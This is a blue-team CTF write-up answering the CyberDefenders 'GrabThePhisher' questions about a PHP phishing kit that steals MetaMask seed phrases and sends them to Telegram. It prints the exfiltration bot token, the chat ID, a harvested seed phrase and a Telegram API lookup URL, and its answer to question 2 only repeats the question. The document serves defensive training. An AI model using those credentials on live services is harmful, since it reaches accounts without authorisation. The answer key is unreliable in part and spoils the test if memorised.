GrabThePhisher Write-up

:الحمد لله والصلاة والسلام على رسول الله وعلى آله وصحبه أما بعد

Instructions:

Scenario:

An attacker compromised a server and impersonated https://pancakeswap.finance/, a decentralized exchange native to BNB Chain, to host a phishing kit at https://apankewk.soup.xyz/mainpage.php. The attacker set it as an open directory with the file name “pankewk.zip”.

Provided the phishing kit, you as a soc analyst are requested to analyze it and do your threat intel homework.

Link: https://cyberdefenders.org/blueteam-ctf-challenges/grabthephisher/

Medium: https://medium.com/@GLITCHGC/grabthephisher-write-up-b99849f18a73

Questions:

1. Which wallet is used for asking the seed phrase?

After Download the zip file you will notice an index.html file open it

The answer will be the first wallet, and the answer depends on the folder named after it in the zip file

Answer: Metamask

2. What is the file name that has the code for the phishing kit?

Answer: What is the file name that has the code for the phishing kit?

3. In which language was the kit written?

Answer: PHP

4. What service does the kit use to retrieve the victim’s machine information?

Answer: Sypex Geo

5. How many seed phrases were already collected?

Answer: 3

6. Write down the seed phrase of the most recent phishing incident?

Answer: father also recycle embody balance concert mechanic believe owner pair muffin hockey

7. Which medium had been used for credential dumping?

Answer: Telegram

8. What is the token for the channel?

Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

9. What is the chat ID of the phisher’s channel?

Answer: 5442785564

10. What are the allies of the phish kit developer?

Answer: j1j1b1s@m3r0

11. What is the full name of the Phish Actor?

Request the api to get the answers “https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564”

Answer: Marcus Aurelius

12. What is the username of the Phish Actor?

Answer: pumpkinboii

You Can Find me Here!

Blog: https://g1it0h.gitbook.io/glitch/

Linkedin: https://www.linkedin.com/in/glitchgc/

Facebook: https://www.facebook.com/GLITC.GC/

Tryhackme: https://tryhackme.com/p/GLITCH1GC

PreviousAmadey Write-upNextBlackEnergy Write-up

Last updated